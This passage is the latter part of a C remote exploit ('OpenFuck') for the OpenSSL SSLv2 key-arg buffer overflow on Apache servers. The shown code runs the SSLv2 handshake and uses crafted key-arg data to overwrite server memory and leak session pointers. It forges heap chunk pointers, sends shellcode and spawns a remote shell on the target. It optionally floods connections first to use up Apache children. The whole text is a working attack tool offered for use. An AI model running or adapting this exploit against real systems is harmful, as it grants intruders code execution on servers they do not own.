  879.         seq = ntohl(ssl->write_seq);
  880.  
  881.         MD5_Init(&ctx);
  882.         MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
  883.         MD5_Update(&ctx, rec, rec_len);
  884.         MD5_Update(&ctx, &seq, 4);
  885.         MD5_Final(p, &ctx);
  886.  
  887.         p+=MD5_DIGEST_LENGTH;
  888.  
  889.         memcpy(p, rec, rec_len);
  890.  
  891.         /* encrypt the payload */
  892.         RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
  893.  
  894.     }
  895.     else {
  896.         memcpy(p, rec, rec_len);
  897.     }
  898.  
  899.     send(ssl->sock, buf, 2 + tot_len, 0);
  900.  
  901.     /* the sequence number is incremented by both encrypted and plaintext packets
  902. */
  903.     ssl->write_seq++;
  904. }
  905.  
  906. /* Send a CLIENT HELLO message to the server */
  907. void send_client_hello(ssl_conn *ssl)
  908. {
  909.     int i;
  910.     unsigned char buf[BUFSIZE] =
  911.         "\x01"            /* client hello msg */
  912.  
  913.         "\x00\x02"        /* client version */
  914.         "\x00\x18"        /* cipher specs length */
  915.         "\x00\x00"        /* session id length */
  916.         "\x00\x10"        /* challenge length */
  917.  
  918.         "\x07\x00\xc0\x05\x00\x80\x03\x00"    /* cipher specs data */
  919.         "\x80\x01\x00\x80\x08\x00\x80\x06"
  920.         "\x00\x40\x04\x00\x80\x02\x00\x80"
  921.  
  922.         "";                                    /* session id data */
  923.  
  924.     /* generate CHALLENGE LENGTH bytes of challenge data */
  925.     for (i = 0; i < CHALLENGE_LENGTH; i++) {
  926.         ssl->challenge[i] = (unsigned char) (rand() >> 24);
  927.     }
  928.     memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
  929.  
  930.     send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
  931. }
  932.  
  933. /* Get a SERVER HELLO response from the server */
  934. void get_server_hello(ssl_conn* ssl)
  935. {
  936.     unsigned char buf[BUFSIZE];
  937.     unsigned char *p, *end;
  938.     int len;
  939.     int server_version, cert_length, cs_length, conn_id_length;
  940.     int found;
  941.  
  942.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  943.         printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  944.         exit(1);
  945.     }
  946.     if (len < 11) {
  947.         printf("get_server_hello: Packet too short (len = %d)\n", len);
  948.         exit(1);
  949.     }
  950.  
  951.     p = buf;
  952.  
  953.     if (*(p++) != SSL2_MT_SERVER_HELLO) {
  954.         printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
  955.         exit(1);
  956.     }
  957.  
  958.     if (*(p++) != 0) {
  959.         printf("get_server_hello: SESSION-ID-HIT is not 0\n");
  960.         exit(1);
  961.     }
  962.  
  963.     if (*(p++) != 1) {
  964.         printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
  965.         exit(1);
  966.     }
  967.  
  968.     n2s(p, server_version);
  969.     if (server_version != 2) {
  970.         printf("get_server_hello: Unsupported server version %d\n", server_version);
  971.         exit(1);
  972.     }
  973.  
  974.     n2s(p, cert_length);
  975.     n2s(p, cs_length);
  976.     n2s(p, conn_id_length);
  977.  
  978.     if (len != 11 + cert_length + cs_length + conn_id_length) {
  979.         printf("get_server_hello: Malformed packet size\n");
  980.         exit(1);
  981.     }
  982.  
  983.     /* read the server certificate */
  984.     ssl->x509 = NULL;
  985.     ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
  986.     if (ssl->x509 == NULL) {
  987.         printf("get server hello: Cannot parse x509 certificate\n");
  988.         exit(1);
  989.     }
  990.  
  991.     if (cs_length % 3 != 0) {
  992.         printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
  993.         exit(1);
  994.     }
  995.  
  996.     found = 0;
  997.     for (end=p+cs_length; p < end; p += 3) {
  998.         if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
  999.             found = 1;    /* SSL CK RC4 128 WITH MD5 */
  1000.     }
  1001.  
  1002.     if (!found) {
  1003.         printf("get server hello: Remote server does not support 128 bit RC4\n");
  1004.         exit(1);
  1005.     }
  1006.  
  1007.     if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
  1008.         printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
  1009.         exit(1);
  1010.     }
  1011.  
  1012.     /* The connection id is sent back to the server in the CLIENT FINISHED packet */
  1013.     ssl->conn_id_length = conn_id_length;
  1014.     memcpy(ssl->conn_id, p, conn_id_length);
  1015. }
  1016.  
  1017. /* Send a CLIENT MASTER KEY message to the server */
  1018.  
  1019. void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
  1020.     int encrypted_key_length, key_arg_length, record_length;
  1021.     unsigned char* p;
  1022.     int i;
  1023.     EVP_PKEY *pkey=NULL;
  1024.  
  1025.     unsigned char buf[BUFSIZE] =
  1026.         "\x02"            /* client master key message */
  1027.         "\x01\x00\x80"    /* cipher kind */
  1028.         "\x00\x00"        /* clear key length */
  1029.         "\x00\x40"        /* encrypted key length */
  1030.         "\x00\x08";        /* key arg length */
  1031.  
  1032.     p = &buf[10];
  1033.  
  1034.     /* generate a 128 byte master key */
  1035.     for (i = 0; i < RC4_KEY_LENGTH; i++) {
  1036.         ssl->master_key[i] = (unsigned char) (rand() >> 24);
  1037.     }
  1038.  
  1039.     pkey=X509_get_pubkey(ssl->x509);
  1040.     if (!pkey) {
  1041.         printf("send client master key: No public key in the server certificate\n");
  1042.         exit(1);
  1043.     }
  1044.  
  1045.     if (pkey->type != EVP_PKEY_RSA) {
  1046.         printf("send client master key: The public key in the server certificate is not a RSA key\n");
  1047.         exit(1);
  1048.     }
  1049.  
  1050.     /* Encrypt the client master key with the server public key and put it in the packet */
  1051.     encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
  1052.     if (encrypted_key_length <= 0) {
  1053.         printf("send client master key: RSA encryption failure\n");
  1054.         exit(1);
  1055.     }
  1056.  
  1057.     p += encrypted_key_length;
  1058.  
  1059.     if (key_arg_overwrite) {
  1060.         /* These 8 bytes fill the key arg array on the server */
  1061.         for (i = 0; i < 8; i++) {
  1062.             *(p++) = (unsigned char) (rand() >> 24);
  1063.         }
  1064.         /* This overwrites the data following the key arg array */
  1065.         memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
  1066.  
  1067.         key_arg_length = 8 + key_arg_overwrite_len;
  1068.     }
  1069.     else {
  1070.         key_arg_length = 0;    /* RC4 doesn't use KEY-ARG */
  1071.     }
  1072.  
  1073.     p = &buf[6];
  1074.     s2n(encrypted_key_length, p);
  1075.     s2n(key_arg_length, p);
  1076.  
  1077.     record_length = 10 + encrypted_key_length + key_arg_length;
  1078.     send_ssl_packet(ssl, buf, record_length);
  1079.  
  1080.     /* all following messages should be encrypted */
  1081.     ssl->encrypted = 1;
  1082. }
  1083.  
  1084. /* Generate the key material using the algorithm described in the SSL2 specification */
  1085. void generate_key_material(ssl_conn* ssl)
  1086. {
  1087.     unsigned int i;
  1088.     MD5_CTX ctx;
  1089.     unsigned char *km;
  1090.     unsigned char c='0';
  1091.  
  1092.     km=ssl->key_material;
  1093.     for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
  1094.         MD5_Init(&ctx);
  1095.  
  1096.         MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
  1097.         MD5_Update(&ctx,&c,1);
  1098.         c++;
  1099.         MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
  1100.         MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
  1101.         MD5_Final(km,&ctx);
  1102.         km+=MD5_DIGEST_LENGTH;
  1103.     }
  1104. }
  1105.  
  1106. /* Generate the RC4 session read and write keys */
  1107. void generate_session_keys(ssl_conn* ssl)
  1108. {
  1109.     generate_key_material(ssl);
  1110.  
  1111.     ssl->read_key = &(ssl->key_material[0]);
  1112.     ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  1113.     RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
  1114.  
  1115.     ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
  1116.     ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  1117.     RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
  1118. }
  1119.  
  1120. /* Get a SERVER VERIFY response from the server */
  1121. void get_server_verify(ssl_conn* ssl)
  1122. {
  1123.     unsigned char buf[BUFSIZE];
  1124.     int len;
  1125.  
  1126.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  1127.         printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  1128.         exit(1);
  1129.     }
  1130.     if (len != 1 + CHALLENGE_LENGTH) {
  1131.         printf("get server verify: Malformed packet size\n");
  1132.         exit(1);
  1133.     }
  1134.  
  1135.     if (buf[0] != SSL2_MT_SERVER_VERIFY) {
  1136.         printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
  1137.         exit(1);
  1138.     }
  1139.  
  1140.     /* If this works, our decryption key is correct */
  1141.     if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
  1142.         printf("get server verify: Challenge strings don't match\n");
  1143.         exit(1);
  1144.     }
  1145. }
  1146.  
  1147. /* Send a CLIENT FINISHED message to the server */
  1148. void send_client_finished(ssl_conn* ssl)
  1149. {
  1150.     unsigned char buf[BUFSIZE];
  1151.  
  1152.     buf[0] = SSL2_MT_CLIENT_FINISHED;
  1153.     memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
  1154.  
  1155.     send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
  1156. }
  1157.  
  1158. /* Get a SERVER FINISHED message from the server */
  1159. void get_server_finished(ssl_conn* ssl)
  1160. {
  1161.     unsigned char buf[BUFSIZE];
  1162.     int len;
  1163.     int i;
  1164.  
  1165.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  1166.         printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  1167.         exit(1);
  1168.     }
  1169.     if (buf[0] != SSL2_MT_SERVER_FINISHED) {
  1170.         printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
  1171.         exit(1);
  1172.     }
  1173.  
  1174.     if (len <= 112 /*17*/) {
  1175.         printf("This server is not vulnerable to this attack.\n");
  1176.         exit(1);
  1177.     }
  1178.     cipher = *(int*)&buf[101];
  1179.     ciphers = *(int*)&buf[109];
  1180.  
  1181.     printf("cipher: 0x%x   ciphers: 0x%x\n", cipher, ciphers);
  1182. }
  1183.  
  1184. void get_server_error(ssl_conn* ssl)
  1185. {
  1186.     unsigned char buf[BUFSIZE];
  1187.     int len;
  1188.  
  1189.     if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
  1190.         printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
  1191.         exit(1);
  1192.     }
  1193. }
  1194.  
  1195. void usage(char* argv0)
  1196. {
  1197.     int i;
  1198.  
  1199.     printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
  1200.     printf("  target - supported box eg: 0x00\n");
  1201.     printf("  box - hostname or IP address\n");
  1202.     printf("  port - port for ssl connection\n");
  1203.     printf("  -c open N connections. (use range 40-50 if u dont know)\n");
  1204.     printf("  \n\n");
  1205.     printf("  Supported OffSet:\n");
  1206.  
  1207.     for (i=0; i<=MAX_ARCH; i++) {
  1208.         printf("\t0x%02x - %s\n", i, architectures[i].desc);
  1209.     }
  1210.     printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");
  1211.  
  1212.     exit(1);
  1213. }
  1214.  
  1215. /* run, code, run */
  1216. int main(int argc, char* argv[])
  1217. {
  1218.     char* host;
  1219.     int port = 443;
  1220.     int i;
  1221.     int arch;
  1222.     int N = 0;
  1223.     ssl_conn* ssl1;
  1224.     ssl_conn* ssl2;
  1225.  
  1226.     printf("\n");
  1227.     printf("****************************************************************************\n");
  1228.     printf("*        OpenFuck v 2.5.3.4       ripped from openssl-too-open             *\n");
  1229.     printf("****************************************************************************\n");
  1230.         printf("*        by SPABAM  with code by LastStageOfDelirium - SolarEclipse - CORE *\n");
  1231.         printf("*    #hackarena    irc.brasnet.org                                      *\n");
  1232.         printf("*                                                                          *\n");
  1233.     printf("*    TNX2         #highsecure #uname #SilverLords #isotk #BloodBR          *\n");
  1234.     printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam          *\n");
  1235.     printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ          *\n");
  1236.     printf("****************************************************************************\n");
  1237.     printf("\n");
  1238.  
  1239.     if ((argc < 3) || (argc > 6))
  1240.         usage(argv[0]);
  1241.  
  1242.     /* pff... use getopt next time, fool */
  1243.  
  1244.     sscanf(argv[1], "0x%x", &arch);
  1245.     if ((arch < 0) || (arch > MAX_ARCH))
  1246.         usage(argv[0]);
  1247.  
  1248.     host = argv[2];
  1249.  
  1250.     if (argc == 4)
  1251.         port = atoi(argv[3]);
  1252.     else if (argc == 5) {
  1253.         if (strcmp(argv[3], "-c"))
  1254.             usage(argv[0]);
  1255.         N = atoi(argv[4]);
  1256.     }
  1257.     else if (argc == 6) {
  1258.         port = atoi(argv[3]);
  1259.         if (strcmp(argv[4], "-c"))
  1260.             usage(argv[0]);
  1261.         N = atoi(argv[5]);
  1262.     }
  1263.  
  1264.     srand(0x31337);
  1265.  
  1266.     /* Open N connections before sending the shellcode. Hopefully this will
  1267.        use up all available apache children and the shellcode will be handled
  1268.        by a freshly spawned one */
  1269.  
  1270.     for (i=0; i<N; i++) {
  1271.         printf("\rConnection... %d of %d", i+1, N);
  1272.         fflush(stdout);
  1273.         connect_host(host, port);
  1274.         usleep(100000);
  1275.     }
  1276.  
  1277.     if (N) printf("\n");
  1278.  
  1279.     /* Establish the first connection. Overwrite session id length, and read
  1280.        the session contents in the SERVER FINISHED packet. We need the cipher
  1281.        and ciphers variables from the session structure to make the shellcode
  1282.        work */
  1283.  
  1284.     printf("Establishing SSL connection\n");
  1285.     ssl1 = ssl_connect_host(host, port);
  1286.     ssl2 = ssl_connect_host(host, port);
  1287.  
  1288.     send_client_hello(ssl1);
  1289.     get_server_hello(ssl1);
  1290.     send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
  1291.     generate_session_keys(ssl1);
  1292.     get_server_verify(ssl1);
  1293.     send_client_finished(ssl1);
  1294.     get_server_finished(ssl1);
  1295.  
  1296.     /* The second connection uses the ciphers variable to get the shellcode
  1297.        address and sends the shellcode to server */
  1298.  
  1299.     printf("Ready to send shellcode\n");
  1300.  
  1301.     port = get_local_port(ssl2->sock);
  1302.     overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
  1303.     overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
  1304.  
  1305.     /* We must overwrite s->session->cipher with its original value */
  1306.     *(int*)&overwrite_next_chunk[156] = cipher;
  1307.  
  1308.     /* The fd and bk pointers of the fake malloc chunk */
  1309.     *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
  1310.     *(int*)&overwrite_next_chunk[196] = ciphers + 16;    /* shellcode address */
  1311.  
  1312.     send_client_hello(ssl2);
  1313.     get_server_hello(ssl2);
  1314.  
  1315.     send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
  1316.     generate_session_keys(ssl2);
  1317.     get_server_verify(ssl2);
  1318.  
  1319.     /* overwrite the connection id with random bytes, causing the server to abort the connection */
  1320.     for (i = 0; i < ssl2->conn_id_length; i++) {
  1321.         ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
  1322.     }
  1323.     send_client_finished(ssl2);
  1324.     get_server_error(ssl2);
  1325.  
  1326.     printf("Spawning shell...\n");
  1327.  
  1328.     sleep(1);
  1329.  
  1330.     sh(ssl2->sock);
  1331.  
  1332.     close(ssl2->sock);
  1333.     close(ssl1->sock);
  1334.  
  1335.     return 0;
  1336. }
  1337.  
  1338. /* spabam: It isn't 0day */
  1339.  
  1340.